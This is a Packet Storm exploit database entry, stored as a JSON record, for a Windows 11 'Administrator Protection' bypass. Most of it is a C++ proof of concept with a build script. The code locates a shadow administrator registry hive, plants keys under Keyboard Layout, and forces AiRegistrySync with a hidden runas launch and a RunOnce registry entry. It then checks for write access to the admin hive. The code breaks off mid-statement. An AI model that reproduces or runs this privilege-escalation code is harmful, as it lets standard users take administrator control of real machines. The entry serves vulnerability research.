{“lastseen”:”2026-02-04T16:29:33″,”description”:”This enhanced proof of concept demonstrates an advanced method for bypassing Windows Administrator Protection by manipulating registry hives using both WinAPI and NTAPI. The code implements safe smart\u2011pointer wrappers for handles, secure SID…”,”published”:”2026-02-04T00:00:00″,”modified”:”2026-02-04T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Microsoft Windows 11 Build 10.0.27898.1000 Advanced Admin Protection Bypass”,”source”:””,”references”:””,”id”:”PACKETSTORM:214888″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Microsoft Windows 11 build 10.0.27898.1000 Advanced Admin Protection Bypass via NTAPI Registry Manipulation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available. |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/212253\/\\n \\n [+] Summary : This enhanced Proof\u2011of\u2011Concept demonstrates an advanced method for bypassing Windows Administrator Protection by manipulating registry hives using both WinAPI and NTAPI.\\n The code implements safe smart\u2011pointer wrappers for handles, secure SID management, deep registry enumeration, privilege checks, \\n \\t\\t\\t shadow administrator SID detection, recursive key deletion, and controlled key creation under HKEY_USERS.\\n It also attempts to trigger Windows\u2019 internal AiRegistrySync mechanism to replicate changes across user hives.\\n The PoC is fully optimized, uses modern C++ RAII patterns, and provides detailed diagnostic output for all operations, \\n \\t\\t\\t making it suitable for research, auditing, and security analysis on Windows 10 and later.\\n \\n [+] POC : \\n \\n build_enhanced.bat):\\n \\n @echo off\\n echo Building AdminProtectionBypass Enhanced PoC…\\n \\n :: \u0627\u0633\u062a\u062e\u062f\u0627\u0645 Visual Studio 2022 Compiler\\n call \\”C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\VC\\\\Auxiliary\\\\Build\\\\vcvars64.bat\\”\\n \\n :: \u0627\u0644\u0628\u0646\u0627\u0621\\n cl.exe AdminProtectionBypass_Enhanced.cpp ^\\n \/O2 ^\\n \/EHsc ^\\n \/std:c++17 ^\\n \/Fe:AdminProtectionBypass_Enhanced.exe ^\\n \/D _WIN32_WINNT=0x0A00 ^\\n \/D _CRT_SECURE_NO_WARNINGS ^\\n \/link ^\\n advapi32.lib ^\\n rpcrt4.lib ^\\n shell32.lib ^\\n user32.lib ^\\n shlwapi.lib\\n \\n if %errorlevel% equ 0 (\\n echo.\\n echo [SUCCESS] Build completed: AdminProtectionBypass_Enhanced.exe\\n echo.\\n echo Usage: AdminProtectionBypass_Enhanced.exe\\n echo Note: Run as standard user for best results\\n ) else (\\n echo.\\n echo [ERROR] Build failed\\n pause\\n )\\n \\n #define WIN32_LEAN_AND_MEAN\\n #define _WIN32_WINNT 0x0A00 \/\/ Windows 10\\n #include \\u003cwindows.h\\u003e\\n #include \\u003cstdio.h\\u003e\\n #include \\u003cstring\\u003e\\n #include \\u003cvector\\u003e\\n #include \\u003csddl.h\\u003e\\n #include \\u003crpc.h\\u003e\\n #include \\u003caclapi.h\\u003e\\n #include \\u003cshlwapi.h\\u003e\\n #include \\u003calgorithm\\u003e\\n #include \\u003cmemory\\u003e\\n \\n #pragma comment(lib, \\”rpcrt4.lib\\”)\\n #pragma comment(lib, \\”advapi32.lib\\”)\\n #pragma comment(lib, \\”shlwapi.lib\\”)\\n \\n \/\/ ==================== NTAPI Definitions ====================\\n typedef struct _RTL_OSVERSIONINFOW {\\n ULONG dwOSVersionInfoSize;\\n ULONG dwMajorVersion;\\n ULONG dwMinorVersion;\\n ULONG dwBuildNumber;\\n ULONG dwPlatformId;\\n WCHAR szCSDVersion[128];\\n } RTL_OSVERSIONINFOW, *PRTL_OSVERSIONINFOW;\\n \\n typedef struct _UNICODE_STRING {\\n USHORT Length;\\n USHORT MaximumLength;\\n PWSTR Buffer;\\n } UNICODE_STRING, *PUNICODE_STRING;\\n \\n typedef struct _OBJECT_ATTRIBUTES {\\n ULONG Length;\\n HANDLE RootDirectory;\\n PUNICODE_STRING ObjectName;\\n ULONG Attributes;\\n PVOID SecurityDescriptor;\\n PVOID SecurityQualityOfService;\\n } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;\\n \\n \/\/ \u062a\u0639\u0631\u064a\u0641 \u0627\u0644\u062b\u0648\u0627\u0628\u062a\\n #define OBJ_CASE_INSENSITIVE 0x00000040L\\n \\n \/\/ \u062a\u0639\u0631\u064a\u0641\u0627\u062a \u0627\u0644\u062f\u0648\u0627\u0644 NTAPI\\n extern \\”C\\” {\\n typedef LONG NTSTATUS;\\n #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) \\u003e= 0)\\n #define STATUS_SUCCESS 0x00000000\\n \\n NTSTATUS NTAPI NtDeleteKey(HANDLE KeyHandle);\\n NTSTATUS NTAPI NtClose(HANDLE Handle);\\n NTSTATUS NTAPI NtOpenKey(\\n PHANDLE KeyHandle,\\n ACCESS_MASK DesiredAccess,\\n POBJECT_ATTRIBUTES ObjectAttributes\\n );\\n VOID NTAPI RtlInitUnicodeString(\\n PUNICODE_STRING DestinationString,\\n PCWSTR SourceString\\n );\\n NTSTATUS NTAPI RtlGetVersion(\\n PRTL_OSVERSIONINFOW lpVersionInformation\\n );\\n }\\n \\n \/\/ ==================== Smart Pointer Wrappers ====================\\n class SmartHandle {\\n public:\\n SmartHandle() : h(nullptr) {}\\n explicit SmartHandle(HANDLE handle) : h(handle) {}\\n \\n \/\/ Delete copy operations\\n SmartHandle(const SmartHandle\\u0026) = delete;\\n SmartHandle\\u0026 operator=(const SmartHandle\\u0026) = delete;\\n \\n \/\/ Allow move operations\\n SmartHandle(SmartHandle\\u0026\\u0026 other) noexcept : h(other.h) {\\n other.h = nullptr;\\n }\\n \\n SmartHandle\\u0026 operator=(SmartHandle\\u0026\\u0026 other) noexcept {\\n if (this != \\u0026other) {\\n if (h) NtClose(h);\\n h = other.h;\\n other.h = nullptr;\\n }\\n return *this;\\n }\\n \\n ~SmartHandle() {\\n if (h) NtClose(h);\\n }\\n \\n HANDLE get() const { return h; }\\n HANDLE* ptr() { return \\u0026h; }\\n operator HANDLE() const { return h; }\\n bool valid() const { return h != nullptr \\u0026\\u0026 h != INVALID_HANDLE_VALUE; }\\n \\n void reset(HANDLE handle = nullptr) {\\n if (h \\u0026\\u0026 h != handle) NtClose(h);\\n h = handle;\\n }\\n \\n private:\\n HANDLE h;\\n };\\n \\n \/\/ Deleter for HKEY\\n struct RegKeyDeleter {\\n void operator()(HKEY hKey) const {\\n if (hKey) RegCloseKey(hKey);\\n }\\n };\\n \\n using SmartRegKey = std::unique_ptr\\u003cstd::remove_pointer\\u003cHKEY\\u003e::type, RegKeyDeleter\\u003e;\\n \\n \/\/ Deleter for SID\\n struct SidDeleter {\\n void operator()(PSID pSid) const {\\n if (pSid) FreeSid(pSid);\\n }\\n };\\n using SmartSid = std::unique_ptr\\u003cvoid, SidDeleter\\u003e;\\n \\n \/\/ ==================== Helper Functions ====================\\n bool IsUserInAdministratorsGroup() {\\n BOOL bIsAdmin = FALSE;\\n PSID pAdminSid = nullptr;\\n SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;\\n \\n if (AllocateAndInitializeSid(\\u0026NtAuthority, 2,\\n SECURITY_BUILTIN_DOMAIN_RID,\\n DOMAIN_ALIAS_RID_ADMINS,\\n 0, 0, 0, 0, 0, 0, \\u0026pAdminSid)) {\\n \\n SmartSid adminSid(pAdminSid);\\n CheckTokenMembership(nullptr, adminSid.get(), \\u0026bIsAdmin);\\n }\\n \\n return bIsAdmin != FALSE;\\n }\\n \\n std::wstring GetCurrentUserSid() {\\n HANDLE hToken = nullptr;\\n if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, \\u0026hToken)) {\\n wprintf(L\\”[!] Failed to open process token: %lu\\\\n\\”, GetLastError());\\n return L\\”\\”;\\n }\\n \\n SmartHandle token(hToken);\\n \\n DWORD tokenInfoSize = 0;\\n GetTokenInformation(token.get(), TokenUser, nullptr, 0, \\u0026tokenInfoSize);\\n \\n if (GetLastError() != ERROR_INSUFFICIENT_BUFFER) {\\n return L\\”\\”;\\n }\\n \\n std::vector\\u003cBYTE\\u003e buffer(tokenInfoSize);\\n PTOKEN_USER pTokenUser = nullptr;\\n \\n if (GetTokenInformation(token.get(), TokenUser, buffer.data(), tokenInfoSize, \\u0026tokenInfoSize)) {\\n pTokenUser = reinterpret_cast\\u003cPTOKEN_USER\\u003e(buffer.data());\\n }\\n \\n LPWSTR sidString = nullptr;\\n std::wstring result;\\n \\n if (pTokenUser \\u0026\\u0026 ConvertSidToStringSidW(pTokenUser-\\u003eUser.Sid, \\u0026sidString)) {\\n result = sidString;\\n LocalFree(sidString);\\n }\\n \\n return result;\\n }\\n \\n std::wstring FindShadowAdminSid() {\\n wprintf(L\\”[*] Searching for shadow administrator hive…\\\\n\\”);\\n \\n HKEY hUsers = nullptr;\\n if (RegOpenKeyExW(HKEY_USERS, nullptr, 0, KEY_READ, \\u0026hUsers) != ERROR_SUCCESS) {\\n return L\\”\\”;\\n }\\n \\n SmartRegKey hUsersKey(hUsers);\\n std::wstring shadowSid;\\n wchar_t subkeyName[256];\\n DWORD index = 0;\\n \\n std::wstring currentSid = GetCurrentUserSid();\\n \\n while (RegEnumKeyW(hUsersKey.get(), index++, subkeyName, ARRAYSIZE(subkeyName)) == ERROR_SUCCESS) {\\n std::wstring sid = subkeyName;\\n \\n \/\/ \u062a\u062c\u0627\u0647\u0644 SID \u0627\u0644\u062d\u0627\u0644\u064a \u0648 SIDs \u0627\u0644\u0646\u0638\u0627\u0645\u064a\u0629\\n if (sid == currentSid || \\n sid.find(L\\”S-1-5-18\\”) == 0 || \/\/ SYSTEM\\n sid.find(L\\”S-1-5-19\\”) == 0 || \/\/ LOCAL SERVICE\\n sid.find(L\\”S-1-5-20\\”) == 0 || \/\/ NETWORK SERVICE\\n sid.find(L\\”_Classes\\”) != std::wstring::npos) {\\n continue;\\n }\\n \\n \/\/ SID \u0637\u0628\u064a\u0639\u064a\\n if (sid.find(L\\”S-1-5-21-\\”) == 0) {\\n \/\/ \u0641\u062d\u0635 hive\\n std::wstring testPath = sid + L\\”\\\\\\\\Environment\\”;\\n HKEY hTest = nullptr;\\n \\n if (RegOpenKeyExW(HKEY_USERS, testPath.c_str(), 0, KEY_READ, \\u0026hTest) == ERROR_SUCCESS) {\\n RegCloseKey(hTest);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0643\u062a\u0627\u0628\u0629 (\u064a\u062c\u0628 \u0623\u0646 \u062a\u0643\u0648\u0646 \u0645\u0645\u0646\u0648\u0639\u0629)\\n if (RegOpenKeyExW(HKEY_USERS, testPath.c_str(), 0, KEY_WRITE, \\u0026hTest) != ERROR_SUCCESS) {\\n shadowSid = sid;\\n wprintf(L\\”[+] Found shadow admin candidate: %s\\\\n\\”, shadowSid.c_str());\\n break;\\n }\\n RegCloseKey(hTest);\\n }\\n }\\n }\\n \\n return shadowSid;\\n }\\n \\n bool CheckRegistryAccess(const std::wstring\\u0026 keyPath, REGSAM desiredAccess) {\\n HKEY hKey = nullptr;\\n \\n LSTATUS status = RegOpenKeyExW(\\n HKEY_USERS,\\n keyPath.c_str(),\\n 0,\\n desiredAccess,\\n \\u0026hKey\\n );\\n \\n SmartRegKey hKeyPtr(hKey);\\n \\n if (status == ERROR_SUCCESS) {\\n wprintf(L\\”[+] Access granted: 0x%08lX to %s\\\\n\\”, desiredAccess, keyPath.c_str());\\n \\n if (desiredAccess \\u0026 KEY_SET_VALUE) {\\n const wchar_t* testValue = L\\”PoC_Test\\”;\\n status = RegSetValueExW(hKeyPtr.get(), L\\”PoC_WriteTest\\”, 0, REG_SZ,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(testValue), \\n static_cast\\u003cDWORD\\u003e((wcslen(testValue) + 1) * sizeof(wchar_t)));\\n \\n if (status == ERROR_SUCCESS) {\\n wprintf(L\\”[+] Write access confirmed\\\\n\\”);\\n RegDeleteValueW(hKeyPtr.get(), L\\”PoC_WriteTest\\”);\\n return true;\\n } else {\\n wprintf(L\\”[!] Write test failed: %lu\\\\n\\”, status);\\n }\\n }\\n return true;\\n }\\n \\n wprintf(L\\”[!] Access denied: 0x%08lX to %s (Error: %lu)\\\\n\\”, \\n desiredAccess, keyPath.c_str(), status);\\n return false;\\n }\\n \\n bool CreateKeyboardLayoutKey(const std::wstring\\u0026 keyPath) {\\n HKEY hReg = nullptr;\\n \\n LONG status = RegCreateKeyExW(\\n HKEY_USERS,\\n keyPath.c_str(),\\n 0, nullptr,\\n REG_OPTION_NON_VOLATILE,\\n KEY_SET_VALUE | KEY_CREATE_SUB_KEY,\\n nullptr,\\n \\u0026hReg, nullptr\\n );\\n \\n if (status != ERROR_SUCCESS) {\\n wprintf(L\\”[!] Failed to create key: %lu\\\\n\\”, status);\\n return false;\\n }\\n \\n SmartRegKey hKey(hReg);\\n wprintf(L\\”[+] Created keyboard layout key: %s\\\\n\\”, keyPath.c_str());\\n \\n \/\/ DWORD value\\n DWORD dwValue = 1;\\n if (RegSetValueExW(hKey.get(), L\\”PoC_DWORD\\”, 0, REG_DWORD,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(\\u0026dwValue), sizeof(dwValue)) == ERROR_SUCCESS) {\\n wprintf(L\\”[+] DWORD value added\\\\n\\”);\\n } else {\\n wprintf(L\\”[!] Failed to add DWORD\\\\n\\”);\\n }\\n \\n \/\/ String value\\n const wchar_t* sVal = L\\”PoC_String\\”;\\n if (RegSetValueExW(hKey.get(), L\\”PoC_String\\”, 0, REG_SZ,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(sVal), \\n static_cast\\u003cDWORD\\u003e((wcslen(sVal) + 1) * sizeof(wchar_t))) == ERROR_SUCCESS) {\\n wprintf(L\\”[+] String value added\\\\n\\”);\\n } else {\\n wprintf(L\\”[!] Failed to add string\\\\n\\”);\\n }\\n \\n return true;\\n }\\n \\n bool DeleteRegistryKey(const std::wstring\\u0026 keyPath) {\\n wprintf(L\\”[*] Deleting key: %s\\\\n\\”, keyPath.c_str());\\n \\n std::wstring ntPath = L\\”\\\\\\\\Registry\\\\\\\\User\\\\\\\\\\” + keyPath;\\n \\n UNICODE_STRING uKey;\\n RtlInitUnicodeString(\\u0026uKey, ntPath.c_str());\\n \\n OBJECT_ATTRIBUTES attr;\\n InitializeObjectAttributes(\\u0026attr, \\u0026uKey, OBJ_CASE_INSENSITIVE, nullptr, nullptr);\\n \\n SmartHandle hKey;\\n \\n NTSTATUS status = NtOpenKey(hKey.ptr(), DELETE, \\u0026attr);\\n if (!NT_SUCCESS(status)) {\\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 WinAPI \u0625\u0630\u0627 \u0641\u0634\u0644 NTAPI\\n wprintf(L\\”[!] NtOpenKey failed: 0x%08X, trying RegDeleteKey…\\\\n\\”, status);\\n \\n if (RegDeleteKeyW(HKEY_USERS, keyPath.c_str()) == ERROR_SUCCESS) {\\n wprintf(L\\”[+] Key deleted via RegDeleteKey\\\\n\\”);\\n return true;\\n }\\n \\n wprintf(L\\”[!] RegDeleteKey also failed: %lu\\\\n\\”, GetLastError());\\n return false;\\n }\\n \\n status = NtDeleteKey(hKey.get());\\n if (!NT_SUCCESS(status)) {\\n wprintf(L\\”[!] NtDeleteKey failed: 0x%08X\\\\n\\”, status);\\n return false;\\n }\\n \\n wprintf(L\\”[+] Key deleted successfully via NTAPI\\\\n\\”);\\n return true;\\n }\\n \\n bool DeleteRegistryKeyRecursive(const std::wstring\\u0026 keyPath) {\\n wprintf(L\\”[*] Recursive delete: %s\\\\n\\”, keyPath.c_str());\\n \\n HKEY hKey = nullptr;\\n LSTATUS status = RegOpenKeyExW(\\n HKEY_USERS,\\n keyPath.c_str(),\\n 0,\\n KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE,\\n \\u0026hKey\\n );\\n \\n if (status != ERROR_SUCCESS) {\\n return false; \/\/ \u0627\u0644\u0645\u0641\u062a\u0627\u062d \u063a\u064a\u0631 \u0645\u0648\u062c\u0648\u062f\\n }\\n \\n SmartRegKey hKeyPtr(hKey);\\n \\n \/\/ \u062c\u0645\u0639 \u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0641\u0627\u062a\u064a\u062d \u0627\u0644\u0641\u0631\u0639\u064a\u0629 \u0623\u0648\u0644\u0627\u064b\\n std::vector\\u003cstd::wstring\\u003e subkeys;\\n wchar_t subkeyName[256];\\n DWORD subkeyIndex = 0;\\n DWORD subkeyNameSize = ARRAYSIZE(subkeyName);\\n \\n while (RegEnumKeyExW(hKeyPtr.get(), subkeyIndex, subkeyName, \\u0026subkeyNameSize,\\n nullptr, nullptr, nullptr, nullptr) == ERROR_SUCCESS) {\\n subkeys.push_back(subkeyName);\\n subkeyNameSize = ARRAYSIZE(subkeyName);\\n subkeyIndex++;\\n }\\n \\n hKeyPtr.reset(); \/\/ \u0625\u063a\u0644\u0627\u0642 \u0627\u0644\u0645\u0641\u062a\u0627\u062d\\n \\n \/\/ \u062d\u0630\u0641 \u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0641\u0627\u062a\u064a\u062d \u0627\u0644\u0641\u0631\u0639\u064a\u0629 \u0628\u0634\u0643\u0644 \u0645\u062a\u0643\u0631\u0631\\n for (const auto\\u0026 subkey : subkeys) {\\n std::wstring fullPath = keyPath + L\\”\\\\\\\\\\” + subkey;\\n DeleteRegistryKeyRecursive(fullPath);\\n }\\n \\n \/\/ \u062d\u0630\u0641 \u0627\u0644\u0645\u0641\u062a\u0627\u062d \u0646\u0641\u0633\u0647\\n return DeleteRegistryKey(keyPath);\\n }\\n \\n bool TriggerAiRegistrySyncViaElevation() {\\n wprintf(L\\”[*] Attempting to trigger AiRegistrySync via elevation…\\\\n\\”);\\n \\n \/\/ \u0637\u0631\u064a\u0642\u0629 1: \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0634\u063a\u064a\u0644 \u0623\u0645\u0631 \u064a\u062d\u062a\u0627\u062c \u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a\\n SHELLEXECUTEINFOW sei = { sizeof(sei) };\\n sei.lpVerb = L\\”runas\\”;\\n sei.lpFile = L\\”cmd.exe\\”;\\n sei.lpParameters = L\\”\/c timeout 1 \\u003e nul\\”;\\n sei.nShow = SW_HIDE;\\n sei.fMask = SEE_MASK_NOCLOSEPROCESS | SEE_MASK_FLAG_NO_UI;\\n \\n if (ShellExecuteExW(\\u0026sei)) {\\n wprintf(L\\”[+] Elevation attempt triggered\\\\n\\”);\\n \\n if (sei.hProcess) {\\n WaitForSingleObject(sei.hProcess, 3000);\\n CloseHandle(sei.hProcess);\\n }\\n return true;\\n }\\n \\n wprintf(L\\”[!] Direct elevation failed: %lu\\\\n\\”, GetLastError());\\n \\n \/\/ \u0637\u0631\u064a\u0642\u0629 2: \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0634\u063a\u064a\u0644 \u0634\u064a\u0621 \u0645\u0646 RunOnce\\n HKEY hRunOnce = nullptr;\\n if (RegOpenKeyExW(HKEY_CURRENT_USER, \\n L\\”Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\RunOnce\\”,\\n 0, KEY_WRITE, \\u0026hRunOnce) == ERROR_SUCCESS) {\\n \\n SmartRegKey hRunOnceKey(hRunOnce);\\n const wchar_t* testValue = L\\”cmd.exe \/c echo Test\\”;\\n \\n RegSetValueExW(hRunOnceKey.get(), L\\”TestSync\\”, 0, REG_SZ,\\n reinterpret_cast\\u003cconst BYTE*\\u003e(testValue),\\n static_cast\\u003cDWORD\\u003e((wcslen(testValue) + 1) * sizeof(wchar_t)));\\n \\n wprintf(L\\”[+] Added RunOnce entry (may trigger sync on next login)\\\\n\\”);\\n return true;\\n }\\n \\n return false;\\n }\\n \\n void WaitForSyncWithProgress(DWORD milliseconds) {\\n wprintf(L\\”[*] Waiting %lu ms for AiRegistrySync…\\\\n\\”, milliseconds);\\n \\n DWORD interval = 1000; \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0643\u0644 \u062b\u0627\u0646\u064a\u0629\\n DWORD elapsed = 0;\\n \\n while (elapsed \\u003c milliseconds) {\\n DWORD waitTime = std::min(interval, milliseconds – elapsed);\\n Sleep(waitTime);\\n elapsed += waitTime;\\n \\n if (elapsed % 5000 == 0 \\u0026\\u0026 elapsed \\u003e 0) {\\n wprintf(L\\”[*] Still waiting… (%lu ms elapsed)\\\\n\\”, elapsed);\\n }\\n }\\n }\\n \\n bool TestVulnerability(const std::wstring\\u0026 userSid, const std::wstring\\u0026 shadowSid) {\\n wprintf(L\\”\\\\n[+] ============================================\\\\n\\”);\\n wprintf(L\\”[+] VULNERABILITY TEST PROCEDURE\\\\n\\”);\\n wprintf(L\\”[+] ============================================\\\\n\\\\n\\”);\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 1: \u0625\u0646\u0634\u0627\u0621 \u0645\u0641\u062a\u0627\u062d \u0641\u064a hive \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\\n wprintf(L\\”[*] Step 1: Creating test key in user hive\\\\n\\”);\\n std::wstring userKeyName = L\\”TestVulnKey_\\” + std::to_wstring(GetTickCount());\\n std::wstring userKeyPath = userSid + L\\”\\\\\\\\Keyboard Layout\\\\\\\\\\” + userKeyName;\\n \\n if (!CreateKeyboardLayoutKey(userKeyPath)) {\\n return false;\\n }\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 2: \u062a\u0641\u0639\u064a\u0644 AiRegistrySync\\n wprintf(L\\”\\\\n[*] Step 2: Triggering AiRegistrySync\\\\n\\”);\\n TriggerAiRegistrySyncViaElevation();\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 3: \u0627\u0644\u0627\u0646\u062a\u0638\u0627\u0631 \u0644\u0644\u0646\u0633\u062e\\n wprintf(L\\”\\\\n[*] Step 3: Waiting for sync to complete\\\\n\\”);\\n WaitForSyncWithProgress(20000); \/\/ 20 \u062b\u0627\u0646\u064a\u0629\\n \\n \/\/ \u0627\u0644\u062e\u0637\u0648\u0629 4: \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0646\u0633\u062e\\n wprintf(L\\”\\\\n[*] Step 4: Checking for key copy to shadow hive\\\\n\\”);\\n std::wstring shadowKeyPath = shadowSid + L\\”\\\\\\\\Keyboard Layout\\\\\\\\\\” + userKeyName;\\n \\n HKEY hShadowKey = nullptr;\\n LSTATUS status = RegOpenKeyExW(\\n HKEY_USERS,\\n shadowKeyPath.c_str(),\\n 0,\\n KEY_READ,\\n \\u0026hShadowKey\\n );\\n \\n SmartRegKey hShadowKeyPtr(hShadowKey);\\n \\n if (status == ERROR_SUCCESS) {\\n wprintf(L\\”[+] SUCCESS: Key was copied to shadow hive!\\\\n\\”);\\n \\n \/\/ \u0642\u0631\u0627\u0621\u0629 \u0627\u0644\u0642\u064a\u0645\u0629 \u0644\u0644\u062a\u0623\u0643\u062f\\n DWORD readValue = 0;\\n DWORD valueSize = sizeof(readValue);\\n if (RegQueryValueExW(hShadowKeyPtr.get(), L\\”PoC_DWORD\\”, nullptr, nullptr,\\n reinterpret_cast\\u003cBYTE*\\u003e(\\u0026readValue), \\u0026valueSize) == ERROR_SUCCESS) {\\n wprintf(L\\”[+] Copied value matches: %lu\\\\n\\”, readValue);\\n \\n \/\/ \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0643\u062a\u0627\u0628\u0629 (\u064a\u062c\u0628 \u0623\u0646 \u062a\u0643\u0648\u0646 \u0645\u0633\u0645\u0648\u062d\u0629 \u0625\u0630\u0627 \u0643\u0627\u0646\u062a \u0627\u0644\u062b\u063a\u0631\u0629 \u0645\u0648\u062c\u0648\u062f\u0629)\\n if (CheckRegistryAccess(shadowKeyPath, KEY_WRITE)) {\\n wprintf(L\\”[!] CRITICAL: Have WRITE access to copied key!\\\\n\\”);\\n wprintf(L\\”[!] This confirms the vulnerability!\\\\n\\”);\\n return true;\\n }\\n }\\n \\n return true;\\n } else {\\n wprintf(L\\”[!] Key not copied to shadow hive\\\\n\\”);\\n wprintf(L\\”[!] Possible reasons:\\\\n\\”);\\n wprintf(L\\” 1. AiRegistrySync not triggered\\\\n\\”);\\n wprintf(L\\” 2. Sync hasn’t completed yet\\\\n\\”);\\n wprintf(L\\” 3. System may be patched\\\\n\\”);\\n wprintf(L\\”[*] Error: %lu\\\\n\\”, status);\\n }\\n \\n return false;\\n }\\n \\n void PrintSystemInfo() {\\n RTL_OSVERSIONINFOW osvi = { sizeof(osvi) };\\n NTSTATUS status = RtlGetVersion(\\u0026osvi);\\n \\n if (NT_SUCCESS(status)) {\\n wprintf(L\\”[*] System Information:\\\\n\\”);\\n wprintf(L\\” OS Version: %lu.%lu\\\\n\\”, osvi.dwMajorVersion, osvi.dwMinorVersion);\\n wprintf(L\\” Build: %lu\\\\n\\”, osvi.dwBuildNumber);\\n \\n if (osvi.dwBuildNumber \\u003e= 27898) {\\n wprintf(L\\” [!] This build supports Administrator Protection\\\\n\\”);\\n } else {\\n wprintf(L\\” [!] This build may not support Administrator Protection\\\\n\\”);\\n }\\n }\\n \\n if (IsUserInAdministratorsGroup()) {\\n wprintf(L\\” Current user: Administrator group member\\\\n\\”);\\n } else {\\n wprintf(L\\” Current user: Standard user (good for testing)\\\\n\\”);\\n }\\n \\n wprintf(L\\”\\\\n\\”);\\n }\\n \\n void CleanupTestKeys(const std::wstring\\u0026 userSid, const std::wstring\\u0026 shadowSid) {\\n wprintf(L\\”\\\\n[*] Cleaning up test keys…\\\\n\\”);\\n \\n \/\/ \u062d\u0630\u0641 \u062c\u0645\u064a\u0639 \u0627\u0644\u0645\u0641\u0627\u062a\u064a\u062d \u0627\u0644\u062a\u064a \u062a\u0628\u062f\u0623 \u0628\u0640 TestVulnKey_ \u0623\u0648 PoC_Key\\n HKEY hUsers = nullptr;\\n if (RegOpenKeyExW(HKEY_USERS, nullptr, 0, KEY_READ, \\u0026hUsers) == ERROR_SUCCESS) {\\n SmartRegKey hUsersKey(hUsers);\\n \\n \/\/ \u0641\u062d\u0635 hive \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\\n std::wstring userBasePath = userSid + L\\”\\\\\\\\Keyboard Layout\\”;\\n DeleteRegistryKeyRecursive(userBasePath + L\\”\\\\\\\\TestVulnKey\\”);\\n DeleteRegistryKeyRecursive(userBasePath + L\\”\\\\\\\\PoC_Key\\”);\\n \\n \/\/ \u0641\u062d\u0635 hive \u0627\u0644\u0640 shadow admin\\n std::wstring shadowBasePath = shadowSid + L\\”\\\\\\\\Keyboard Layout\\”;\\n DeleteRegistryKeyRecursive(shadowBasePath + L\\”\\\\\\\\TestVulnKey\\”);\\n DeleteRegistryKeyRecursive(shadowBasePath + L\\”\\\\\\\\PoC_Key\\”);\\n }\\n \\n wprintf(L\\”[+] Cleanup completed\\\\n\\”);\\n }\\n \\n int main() {\\n wprintf(L\\”====================================================\\\\n\\”);\\n wprintf(L\\” Windows Admin Protection Bypass PoC – Enhanced\\\\n\\”);\\n wprintf(L\\” AiRegistrySync Symbolic Link EoP Vulnerability\\\\n\\”);\\n wprintf(L\\” With Smart Pointer Implementation\\\\n\\”);\\n wprintf(L\\”====================================================\\\\n\\\\n\\”);\\n \\n \/\/ \u0639\u0631\u0636 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0627\u0644\u0646\u0638\u0627\u0645\\n PrintSystemInfo();\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0623\u0646\u0646\u0627 \u0644\u0633\u0646\u0627 \u0645\u062f\u064a\u0631 \u0646\u0638\u0627\u0645\\n if (IsUserInAdministratorsGroup()) {\\n wprintf(L\\”[!] WARNING: User is in Administrators group\\\\n\\”);\\n wprintf(L\\”[!] For best results, run as standard user\\\\n\\”);\\n wprintf(L\\”[!] Continue anyway? (Y\/N): \\”);\\n \\n int c = getchar();\\n if (c != ‘Y’ \\u0026\\u0026 c != ‘y’) {\\n return 0;\\n }\\n getchar(); \/\/ Consume newline\\n }\\n \\n \/\/ \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 SIDs\\n std::wstring userSid = GetCurrentUserSid();\\n if (userSid.empty()) {\\n wprintf(L\\”[!] Failed to get current user SID\\\\n\\”);\\n return 1;\\n }\\n wprintf(L\\”[+] Current user SID: %s\\\\n\\\\n\\”, userSid.c_str());\\n \\n std::wstring shadowSid = FindShadowAdminSid();\\n if (shadowSid.empty()) {\\n wprintf(L\\”[!] Could not find shadow admin SID\\\\n\\”);\\n wprintf(L\\”[!] Possible reasons:\\\\n\\”);\\n wprintf(L\\” 1. Administrator Protection not enabled\\\\n\\”);\\n wprintf(L\\” 2. No administrator logged in recently\\\\n\\”);\\n wprintf(L\\” 3. Different Windows version\\\\n\\”);\\n return 1;\\n }\\n wprintf(L\\”[+] Shadow admin SID: %s\\\\n\\\\n\\”, shadowSid.c_str());\\n \\n \/\/ \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0627\u0644\u0648\u0635\u0648\u0644 \u0627\u0644\u062d\u0627\u0644\u064a\\n wprintf(L\\”[*] Testing current access levels…\\\\n\\”);\\n std::wstring shadowEnv = shadowSid + L\\”\\\\\\\\Environment\\”;\\n \\n wprintf(L\\” Read access to Environment: \\”);\\n CheckRegistryAccess(shadowEnv, 